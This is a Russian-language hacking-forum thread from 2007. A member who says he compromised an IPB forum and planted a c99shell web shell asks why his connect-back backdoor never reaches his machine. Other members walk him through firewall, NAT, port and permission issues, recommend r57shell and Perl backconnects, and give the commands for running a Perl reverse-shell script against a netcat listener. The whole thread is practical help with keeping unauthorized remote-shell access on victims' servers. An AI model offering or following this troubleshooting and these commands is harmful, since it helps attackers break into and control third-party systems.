Проблема с коннбэк-бэкдором

Discussion in 'Безопасность и Анонимность' started by icknull, 20 Aug 2007.

  1. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Всем привет!
    Проблема следующая: сломал, я значит форум ipb 1.3 final, залил шелл и хотел замутить connback-backdoor (я использовал c99shell). Но запустив nc на локальной машине, я так и не дождался коннекта.
    Пробовал другие веб-шеллы и серваки, то же самое. Не коннектится, блин...
    Может у меня не хватает прав или чего еще?
    Спасибо!
     
  2. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    может фаервол
     
  3. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    На нескольких сайтах подряд? Вряд ли, да и сомневаюсь что фаер закрывает и исходящие коннекты...
     
  4. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    а что он потвоему вообще делает? лол.
     
  5. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Так то оно так, я имел ввиду что на тех серверах фаер плохо настроен
     
  6. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Попробуй поменять порт коннбэка. Например на 4000 и обязательно отключи персональный файерволл, если он у тебя есть. Ведь от бэкдора для твоего компа будет входящее соединение, а фаер на неизвестные порты их блокирует. Плюс если у тебя сокс, то с99 неправильно определит твой ip. А бэкконнект возможен только на реальный ip. Если у тебя ВПН, опять таки коннект возможен только на твой "родной" ip.
    Свой ip я,например, определяю прогой Angry ip scanner.
     
  7. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Порт менял. Это точно не сокс и не vpn. Фаер мой молчит.
    Что еще может быть? Может прав мало? Хотя они не nobody...
     
  8. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    ФАЕР НАДО ОТКЛЮЧАТЬ. Можно конечно с правилами мутить, но не стоит.
     
  9. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    Хм, извиняй конечно, но не через нат-ли ты сидишь? У тебя белый ИП?
    Если белый, то скорее всего просто прав не хватает...хотя...подними у себя апач, настрой права, и протесть на себе ;)
     
  10. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Ната нет, а что такое белый ip?
    У себя нормально работает.
    Я вот что еще попробовал. Закачал сишный конбэк, хотел скомпилить, но в ответ шелл ничего не выдал. Может я не могу вообще запускать никакие бинарники?
    Вообще, парни, я запутался, если честно...((
     
  11. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    К тебе вообще извне могут приконнектиться???
    Под nobody врядли у тебя сищный бек скомпилится...
    Ты точно УВЕРЕН что ты не за НАТом сидишь?
     
  12. FaR-G9

    FaR-G9 Member

    Joined:
    19 Dec 2006
    Messages:
    114
    Likes Received:
    28
    Reputations:
    -4
    Попробуй бэк на r57shell'e
    ЗЫ У тебя случайно Ip не 192.168?
     
  13. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    +1 и попробуй back на перле тоже. ПЛЮС ОТРУБИ ФАЕР!!!!
     
  14. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    1. Да я точно уверен, что я сижу не за NAT'ом и что мой ip не 192.168.*.* ))
    2. Пробовал несколько шеллов, в том числе и r57shell. То же самое ((
    3. Конбэк на перле тоже пробовал.
    4. Фаер отрублен.

    P.S. C99Shell пишет "Can't download sources!"
     
  15. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Хе хе. У тебя нет даже прав на запись=( Ищи папку с правами на запись, начнем с этого. Попробуй зайти в /tmp и залить туда конбэк на перле сторонний. О результатах отпишись.
     
  16. biophreak

    biophreak Elder - Старейшина

    Joined:
    3 Aug 2007
    Messages:
    348
    Likes Received:
    63
    Reputations:
    15
    Хм...скажи свой ип в ПМ и порт слушай в nc - проверим в чем дело - в прове твоем или в хостах(ну или самом коннбеке) :)))
     
  17. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Хм...странно, но ведь в папку со смайликами есть доступ у всех? Или я ошибаюсь?
    З.Ы. Хорошо было бы исходник конбэка на перле, если не трудно
     
  18. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    Я попробовал запустить бэкдор из /tmp, но wget и gcc не хотят работать...
     
  19. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    Перловый конбэк
    Выручал меня бессчетное кол-во раз.
    Юзать: Perl sw.pl 127.0.0.1 4000
    Вместо 127.0.0.1 ставь СВОЙ ip адрес.
    Соответственно на твоем компе должен висеть netcat: nc -l -p 4000
     
  20. icknull

    icknull Banned

    Joined:
    14 Aug 2007
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    За конбэк респект! Щас попробую!